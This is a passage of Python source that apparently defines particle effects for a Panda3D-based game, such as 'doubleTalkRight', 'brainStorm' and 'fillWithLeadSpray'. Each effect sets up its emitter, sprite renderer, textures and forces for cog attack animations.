    p0.emitter.setAmplitudeSpread(2.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Point parameters
    p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('jfo')
    # Force parameters
    force0 = LinearJitterForce(4.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 0.5000, 1.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    force2 = LinearSinkForce(Point3(0.0000, 1.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
    force2.setActive(1)
    f0.addForce(force2)
    self.addForceGroup(f0)
@particle
def doubleTalkRight(self):
    """Two large "**/doubletalk-good" sprites fired from a tiny sphere and
    bent sideways by an off-axis sink force.
    """
    self.reset()
    self.setPos(0.000, 3.000, 3.000)
    self.setHpr(-55.000, 0.000, 0.000)
    self.setScale(3.000, 3.000, 3.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(2)
    p0.setBirthRate(0.7000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.7000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/doubletalk-good")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(1.5)
    p0.renderer.setFinalXScale(1.5)
    p0.renderer.setInitialYScale(1.5)
    p0.renderer.setFinalYScale(1.5)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(12.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.6000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -8.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.0500)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(-6.000, -3.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def filibusterSpray(self):
    """Single 'filibuster-cut' sprite sprayed forward and pulled back by a sink force."""
    self.reset()
    self.setPos(0.000, 3.000, 4.000)
    self.setHpr(0.000, 55.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(1)
    part.setBirthRate(0.400)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.2700)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: textured sprite that grows over its life (X/Y scale flags on)
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/filibuster-cut")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(1)
    part.renderer.setYScaleFlag(1)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.3*1.5)
    part.renderer.setFinalXScale(0.75*1.5)
    part.renderer.setInitialYScale(0.15*1.5)
    part.renderer.setFinalYScale(0.25*1.5)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate out of a small sphere volume
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(5.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 8.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
    part.emitter.setRadius(0.1000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # One sink force draws the sprite down and back
    sink = LinearSinkForce(Point3(0.0000, -9.0000, -11.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    self.addForceGroup(fgroup)
@particle
def fingerwag2(self):
    """Ring of 'blah' speech sprites that shrink away; no active forces."""
    self.reset()
    self.setPos(0.228, 0.880, 4.314)
    self.setHpr(-2.862, -36.310, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration (large pool, finite system lifespan)
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("RingEmitter")
    part.setPoolSize(250)
    part.setBirthRate(0.3000)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(2.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.6000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(410.7267)
    part.factory.setTerminalVelocitySpread(2.3816)
    # Renderer: sprite shrinks from birth size to near nothing
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(0.86)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/blah")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.400)
    part.renderer.setFinalXScale(0.0200)
    part.renderer.setInitialYScale(0.200)
    part.renderer.setFinalYScale(0.0200)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPNOBLEND)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate from a unit ring
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(1.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(1.0000)
    self.addParticles(part)
    # Empty force group (kept for parity with the original effect data)
    fgroup = ForceGroup.ForceGroup('jfo')
    self.addForceGroup(fgroup)
@particle
def schmoozeLowerSpray(self):
    """Single 'schmooze-master' sprite spray, shrinking in flight, steered by a sink force."""
    self.reset()
    self.setPos(0.000, 6.600, 3.290)
    self.setHpr(0.000, -55.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(1)
    part.setBirthRate(0.400)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.900)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: sprite shrinks from 0.7/0.35 down to 0.07
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/schmooze-master")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.7)
    part.renderer.setFinalXScale(0.07)
    part.renderer.setInitialYScale(0.35)
    part.renderer.setFinalYScale(0.07)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate out of a small sphere volume, strong forward offset
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(5.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 11.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
    part.emitter.setRadius(0.1000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # One sink force bends the trajectory
    sink = LinearSinkForce(Point3(0.0000, -23.0000, 9.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    self.addForceGroup(fgroup)
@particle
def brainStorm(self):
    """Cloud of 'brainstorm-box' sprites radiating from a disc, jittered by a force."""
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("DiscEmitter")
    part.setPoolSize(70)
    part.setBirthRate(0.4)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: sprite shrinks away over its one-second life
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/brainstorm-box")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.600)
    part.renderer.setFinalXScale(0.0400)
    part.renderer.setInitialYScale(0.30)
    part.renderer.setFinalYScale(0.0400)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate away from a point above the disc
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(5.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 5.0000))
    part.emitter.setRadius(0.5000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Strong jitter gives the storm its chaotic motion
    jitter = LinearJitterForce(15.0000, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def numberSpray(self):
    """Black 'fire' sprite spray that grows in flight; sink + vector forces shape the arc."""
    self.reset()
    self.setPos(0.000, 2.700, 3.900)
    self.setHpr(-180.000, 80.000, -180.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(1)
    part.setBirthRate(0.2000)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(2.1000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: black-tinted sprite, grows as it travels (scale flags on)
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
    part.renderer.setColor(Vec4(0.00, 0.00, 0.00, 1.00))
    part.renderer.setXScaleFlag(1)
    part.renderer.setYScaleFlag(1)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.125)
    part.renderer.setFinalXScale(0.5)
    part.renderer.setInitialYScale(0.2)
    part.renderer.setFinalYScale(1.0)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate with spread amplitude and forward/down offset
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(5.1000)
    part.emitter.setAmplitudeSpread(2.5000)
    part.emitter.setOffsetForce(Vec3(0.0000, 9.1000, -4.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    part.emitter.setRadius(0.500)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Sink pulls particles downward toward a point below the origin
    sink = LinearSinkForce(Point3(0.0000, 0.0000, -3.5000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    # Constant backward push
    push = LinearVectorForce(Vec3(0.0000, -10.0000, 0.0000), 1.0000, 0)
    push.setActive(1)
    fgroup.addForce(push)
    self.addForceGroup(fgroup)
@particle
def demotionUnFreeze(self):
    """Burst of 'roll-o-dex' sprites radiating from a sphere volume; no force group."""
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.000, 2.000, 2.000)
    part = Particles.Particles('particles-1')
    # System-level configuration: dense, short-lived litters
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(70)
    part.setBirthRate(0.0200)
    part.setLitterSize(10)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: half-second particle lifetime
    part.factory.setLifespanBase(0.5000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: tiny sprites that shrink to nothing
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.04)
    part.renderer.setFinalXScale(0.000)
    part.renderer.setInitialYScale(0.04)
    part.renderer.setFinalYScale(0.000)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate outward from the origin
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(4.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(0.6000)
    self.addParticles(part)
@particle
def fillWithLeadSmother(self):
    """Shell of tiny 'mumbojumbo-iron' sprites imploding (negative amplitude) with heavy jitter."""
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration: rapid large litters from a sphere surface
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereSurfaceEmitter")
    part.setPoolSize(100)
    part.setBirthRate(0.0400)
    part.setLitterSize(20)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: half-second lifetime with slight spread
    part.factory.setLifespanBase(0.5000)
    part.factory.setLifespanSpread(0.0300)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: constant tiny sprite size
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.0100)
    part.renderer.setFinalXScale(0.0100)
    part.renderer.setInitialYScale(0.0100)
    part.renderer.setFinalYScale(0.0100)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: negative amplitude drives particles inward
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(-5.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(1.1000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Very strong jitter for a smothering shimmer
    jitter = LinearJitterForce(37.2697, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def downsizeSpray(self):
    """Yellow 'snow-particle' spray; sink, vector, and jitter forces shape the stream."""
    self.reset()
    self.setPos(0.000, 2.900, 3.400)
    self.setHpr(0.000, 60.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(50)
    part.setBirthRate(0.1000)
    part.setLitterSize(7)
    part.setLitterSpread(2)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.3000)
    part.factory.setLifespanSpread(0.2000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: small yellow sprites that halve in size (scale flags on)
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    part.renderer.setColor(Vec4(1.00, 1.00, 0.00, 0.80))
    part.renderer.setXScaleFlag(1)
    part.renderer.setYScaleFlag(1)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.0750)
    part.renderer.setFinalXScale(0.0375)
    part.renderer.setInitialYScale(0.055)
    part.renderer.setFinalYScale(0.024)
    part.renderer.setNonanimatedTheta(20.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: near-point source radiating forward
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(4.9000)
    part.emitter.setAmplitudeSpread(0.3000)
    part.emitter.setOffsetForce(Vec3(0.0000, 7.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    part.emitter.setRadius(0.0010)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Downward sink
    sink = LinearSinkForce(Point3(0.0000, 0.0000, -5.3000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    # Constant backward push
    push = LinearVectorForce(Vec3(0.0000, -7.0000, 0.0000), 1.0000, 0)
    push.setActive(1)
    fgroup.addForce(push)
    # Mild jitter for spray texture
    jitter = LinearJitterForce(8.5449, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def fillWithLeadSpray(self):
    """Dense spray of tiny 'roll-o-dex' sprites driven by lift, sink, noise, and jitter forces."""
    self.reset()
    self.setPos(0.000, 2.000, 2.300)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration: very large litters at a fast rate
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(150)
    part.setBirthRate(0.0400)
    part.setLitterSize(45)
    part.setLitterSpread(1)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: long lifetime with spread, slight mass variation
    part.factory.setLifespanBase(2.9000)
    part.factory.setLifespanSpread(0.4000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.2000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: no alpha fade, constant tiny size
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.010)
    part.renderer.setFinalXScale(0.010)
    part.renderer.setInitialYScale(0.010)
    part.renderer.setFinalYScale(0.010)
    part.renderer.setNonanimatedTheta(5.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: near-point source radiating forward
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(5.0000)
    part.emitter.setAmplitudeSpread(1.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 5.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -7.0000, 0.0000))
    part.emitter.setRadius(0.01000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Upward lift
    lift = LinearVectorForce(Vec3(0.0000, 0.0000, 5.0000), 1.0000, 0)
    lift.setActive(1)
    fgroup.addForce(lift)
    # Strong sink well below the effect
    sink = LinearSinkForce(Point3(0.0000, 0.0000, -8.0000), LinearDistanceForce.FTONEOVERRSQUARED, 14.5479, 155.9407, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    # Noise plus jitter for turbulence
    noise = LinearNoiseForce(1.7000, 0)
    noise.setActive(1)
    fgroup.addForce(noise)
    jitter = LinearJitterForce(12.5698, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def reorgCloud(self):
    """Red 'snow-particle' shell collapsing inward from a sphere surface; no forces."""
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.000, 2.000, 2.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereSurfaceEmitter")
    part.setPoolSize(70)
    part.setBirthRate(0.0200)
    part.setLitterSize(10)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: half-second particle lifetime
    part.factory.setLifespanBase(0.5000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: tiny red sprites that shrink to nothing
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    part.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.003)
    part.renderer.setFinalXScale(0.000)
    part.renderer.setInitialYScale(0.003)
    part.renderer.setFinalYScale(0.000)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: negative amplitude pulls particles toward the center
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(-1.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(1.0000)
    self.addParticles(part)
@particle
def demotionFreeze(self):
    """'roll-o-dex' shell collapsing inward from a sphere surface; no forces."""
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.000, 2.000, 2.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereSurfaceEmitter")
    part.setPoolSize(70)
    part.setBirthRate(0.0200)
    part.setLitterSize(10)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: half-second particle lifetime
    part.factory.setLifespanBase(0.5000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
